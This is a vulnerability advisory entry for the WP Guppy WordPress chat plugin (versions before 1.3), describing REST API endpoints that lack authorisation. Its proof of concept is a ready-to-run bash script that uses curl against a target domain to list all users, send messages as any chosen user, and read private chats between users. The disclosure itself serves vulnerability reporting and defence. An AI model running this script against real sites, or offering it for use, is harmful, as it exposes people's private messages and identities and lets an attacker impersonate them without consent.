WordPress Plugin Vulnerabilities
WP Guppy < 1.3 - Sensitive Information Disclosure
Description
The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user
Proof of Concept
#!/bin/bash #Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure #Exploit Author: Keyvan Hardani #Date: 22/11/2021 #Vendor Homepage: https://wp-guppy.com/ #Version: up to 1.1 #Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2 #Usage ./exploit.sh -h Help() { # Display Help echo "Usage" echo echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure" echo echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)" echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" echo "-h Print this Help." echo } while getopts ":h" option; do case $option in h) # display Help Help exit;; esac done if [ $1 == 1 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool fi if [ $1 == 2 ] then curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool fi if [ $1 == 3 ] then curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool fi
Affects Plugins
References
CVE
Exploitdb
URL
YouTube Video
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Keyvan Hardani
Submitter
Keyvan Hardani
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-22 (about 2 years ago)
Added
2021-11-23 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)